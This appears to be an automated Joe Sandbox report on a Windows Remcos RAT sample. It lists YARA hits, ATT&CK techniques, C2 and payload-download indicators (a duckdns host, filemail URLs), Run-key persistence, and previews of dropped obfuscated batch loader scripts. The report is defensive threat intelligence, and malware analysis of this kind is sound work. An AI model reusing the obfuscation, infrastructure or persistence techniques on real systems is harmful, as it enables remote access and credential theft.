Source: C:\Windows\SysWOW64\colorcpl.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-L3FHGJ
Source: Yara match | File source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTR
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: cmd.exe | 5_2_04A8567A
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 Valid Accounts | 1 Valid Accounts | 2 Obfuscated Files or Information | 111 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 111 Input Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 1 Windows Service | 11 Access Token Manipulation | 1 DLL Side-Loading | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 1 Windows Service | 11 Masquerading | NTDS | 1 System Network Connections Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 411 Process Injection | 1 Valid Accounts | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Registry Run Keys / Startup Folder | 2 Virtualization/Sandbox Evasion | Cached Domain Credentials | 45 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Access Token Manipulation | DCSync | 331 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 411 Process Injection | Proc Filesystem | 2 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 2 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph (figure not reproduced; node data recovered from the graph): Behavior Graph ID: 1576964, Sample: MeP66xi1AM.exe, Startdate: 17/12/2024, Architecture: WINDOWS, Score: 100
• Start node: DNS/IP hafiznor3374.duckdns.org, 1010.filemail.com, ip.1010.filemail.com; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Malicious sample detected (through community Yara rule), 13 other signatures; hafiznor3374.duckdns.org: Uses dynamic DNS services
• Process MeP66xi1AM.exe (1 9, started): DNS/IP ip.1010.filemail.com 23.237.50.106, 443, 49707, 49708 COGENT-174US United States; dropped: C:\Users\Public\Libraries\Wnbcdrjt.PIF (PE32), C:\Users\Public\Wnbcdrjt.url (MS), C:\Users\Public\Libraries\Wnbcdrjt (data), C:\Users\Public\Libraries\FX.cmd (DOS); signatures: Drops PE files with a suspicious file extension, Writes to foreign memory regions, Allocates memory in foreign processes, 4 other signatures; starts colorcpl.exe (4) and cmd.exe (1)
• Process Wnbcdrjt.PIF (5, started): signatures: Multi AV Scanner detection for dropped file, Machine Learning detection for dropped file, Sample is not signed and drops a device driver; starts cmd.exe and colorcpl.exe
• Process colorcpl.exe (started by MeP66xi1AM.exe): DNS/IP hafiznor3374.duckdns.org 192.169.69.26, 4610, 49710, 49742 WOWUS United States; 127.0.0.1 unknown unknown; signatures: Detected Remcos RAT, Contains functionalty to change the wallpaper, Contains functionality to steal Chrome passwords or cookies, 3 other signatures
• Both cmd.exe processes start conhost.exe

Source | Detection | Scanner | Label | Link
MeP66xi1AM.exe | 53% | ReversingLabs | Win32.Trojan.ModiLoader |
MeP66xi1AM.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\Public\Libraries\Wnbcdrjt.PIF | 100% | Joe Sandbox ML | |
C:\Users\Public\Libraries\Wnbcdrjt.PIF | 53% | ReversingLabs | Win32.Trojan.ModiLoader |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://1010.filemail.com/Ff | 0% | Avira URL Cloud | safe |
https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326 | 0% | Avira URL Cloud | safe |
https://1010.filemail.com:443/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodR | 0% | Avira URL Cloud | safe |
https://1010.filemail.com/api/fi | 0% | Avira URL Cloud | safe |
https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZP | 0% | Avira URL Cloud | safe |
http://www.pmail.com0 | 0% | Avira URL Cloud | safe |
http://ocsp.sectigo.com0C | 0% | Avira URL Cloud | safe |
hafiznor3374.duckdns.org | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hafiznor3374.duckdns.org | 192.169.69.26 | true | true | | unknown
ip.1010.filemail.com | 23.237.50.106 | true | false | | unknown
1010.filemail.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326 | true | Avira URL Cloud: safe | unknown
hafiznor3374.duckdns.org | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp | colorcpl.exe | false | | high
https://1010.filemail.com:443/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodR | MeP66xi1AM.exe, 00000000.00000002.2192520767.000000000083F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0 | MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZP | MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.sectigo.com0 | MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp/C | colorcpl.exe, 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://1010.filemail.com/api/fi | MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A7D000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://1010.filemail.com/Ff | MeP66xi1AM.exe, 00000000.00000002.2192520767.00000000007CE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.sectigo.com0C | MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.pmail.com0 | MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.169.69.26 | hafiznor3374.duckdns.org | United States | 23033 | WOWUS | true
23.237.50.106 | ip.1010.filemail.com | United States | 174 | COGENT-174US | false
IP
127.0.0.1
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1576964
                                    Start date and time:2024-12-17 19:46:07 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 22s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:MeP66xi1AM.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:b9803b83ed42e8f63e73719cfffeff30ecfabeca676a3a04a087754e2608a1c5.exe
                                    Detection:MAL
                                    Classification:mal100.rans.troj.spyw.evad.winEXE@14/6@5/3
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 80
                                    • Number of non-executed functions: 230
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212, 4.175.87.197
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: MeP66xi1AM.exe
Time | Type | Description
13:46:59 | API Interceptor | 2x Sleep call for process: MeP66xi1AM.exe modified
13:47:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wnbcdrjt C:\Users\Public\Wnbcdrjt.url
13:47:17 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wnbcdrjt C:\Users\Public\Wnbcdrjt.url
13:47:18 | API Interceptor | 2x Sleep call for process: Wnbcdrjt.PIF modified
13:47:43 | API Interceptor | 5044056x Sleep call for process: colorcpl.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
192.169.69.26 | f5ATZ1i5CU.exe | malicious | RedLine, XWorm | duclog23.duckdns.org:37552/
192.169.69.26 | SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | yuya0415.duckdns.org:1928/Vre
192.169.69.26 | confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbs | malicious | Unknown | servidorarquivos.duckdns.org/e/e
192.169.69.26 | oKtkBYZMWl.exe | malicious | Unknown | csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
192.169.69.26 | oKtkBYZMWl.exe | malicious | Unknown | csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
192.169.69.26 | http://yvtplhuqem.duckdns.org/ja/ | malicious | Unknown | yvtplhuqem.duckdns.org/ja/
192.169.69.26 | http://fqqqffcydg.duckdns.org/en/ | malicious | Unknown | fqqqffcydg.duckdns.org/en/
192.169.69.26 | http://yugdzvsqnf.duckdns.org/en/ | malicious | Unknown | yugdzvsqnf.duckdns.org/en/
192.169.69.26 | &nuevo_pedido#..vbs | malicious | Unknown | servidorarquivos.duckdns.org/e/e
192.169.69.26 | transferencia_Hsbc.xlsx | malicious | Unknown | servidorarquivos.duckdns.org/e/e
23.237.50.106 | https://www.filemail.com/t/cFCAI9C4 | malicious | HtmlDropper |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip.1010.filemail.com | https://www.filemail.com/t/cFCAI9C4 | malicious | HtmlDropper | 23.237.50.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WOWUS | greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta | malicious | Cobalt Strike, Remcos | 192.169.69.26
WOWUS | RFQ_#24429725,pdf.exe | malicious | AsyncRAT | 192.169.69.26
WOWUS | hesaphareketi-01.pdf.exe | malicious | AsyncRAT | 192.169.69.26
WOWUS | seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta | malicious | Cobalt Strike, Remcos | 192.169.69.26
WOWUS | sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta | malicious | Cobalt Strike, Remcos | 192.169.69.26
WOWUS | 1734388385543fca13ccf5614dc71c1922a5cd8cddeb80fc9e4bce55f618d2232c3744cd06117.dat-decoded.exe | malicious | Remcos | 192.169.69.26
WOWUS | x295IO8kqM.exe | malicious | Remcos | 192.169.69.26
WOWUS | zvXPSu3dK5.exe | malicious | AsyncRAT | 192.169.69.26
WOWUS | 173398584769f9c5bcf28a71f77fba1335e77fe6b4cc4f05afc05fdd9f5830429be0bc9fb5758.dat-decoded.exe | malicious | Remcos | 192.169.69.26
WOWUS | nicegirlforyou.hta | malicious | Cobalt Strike, Remcos | 192.169.69.26
COGENT-174US | https://6movies.stream/series/cobra-kai-80711/6-4/ | malicious | Unknown | 50.7.236.66
COGENT-174US | http://85off-lv.com | malicious | Unknown | 38.177.146.78
COGENT-174US | GameBoxMini.exe | malicious | Unknown | 154.23.182.10
COGENT-174US | 236236236.elf | malicious | Unknown | 154.23.5.217
COGENT-174US | i686.elf | malicious | Mirai | 38.180.143.40
COGENT-174US | mpsl.elf | malicious | Mirai | 38.88.3.212
COGENT-174US | i486.elf | malicious | Mirai | 154.31.65.187
COGENT-174US | mips.elf | malicious | Mirai | 38.180.143.40
COGENT-174US | armv5l.elf | malicious | Mirai | 38.180.143.40
COGENT-174US | armv7l.elf | malicious | Mirai | 38.180.143.40
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer | 23.237.50.106
a0e9f5d64349fb13191bc781f81f42e1 | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer | 23.237.50.106
a0e9f5d64349fb13191bc781f81f42e1 | lavita.msi | malicious | BruteRatel, Latrodectus | 23.237.50.106
a0e9f5d64349fb13191bc781f81f42e1 | sNWQ2gC6if.exe | malicious | LummaC | 23.237.50.106
a0e9f5d64349fb13191bc781f81f42e1 | 66DJ2wErLz.exe | malicious | LummaC | 23.237.50.106
a0e9f5d64349fb13191bc781f81f42e1 | out.bin.exe | malicious | LummaC | 23.237.50.106
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig | 23.237.50.106
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig | 23.237.50.106
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Xmrig | 23.237.50.106
a0e9f5d64349fb13191bc781f81f42e1 | jYd7FUgGZc.exe | malicious | LummaC, Stealc | 23.237.50.106
No context
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8556
                                      Entropy (8bit):4.623706637784657
                                      Encrypted:false
                                      SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                      MD5:60CD0BE570DECD49E4798554639A05AE
                                      SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                      SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                      SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                      Malicious:true
                                      Reputation:low
                                      Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):46543
                                      Entropy (8bit):4.705001079878445
                                      Encrypted:false
                                      SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                      MD5:637A66953F03B084808934ED7DF7192F
                                      SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                      SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                      SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                      Malicious:false
                                      Reputation:low
                                      Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):811525
                                      Entropy (8bit):7.5927403967098615
                                      Encrypted:false
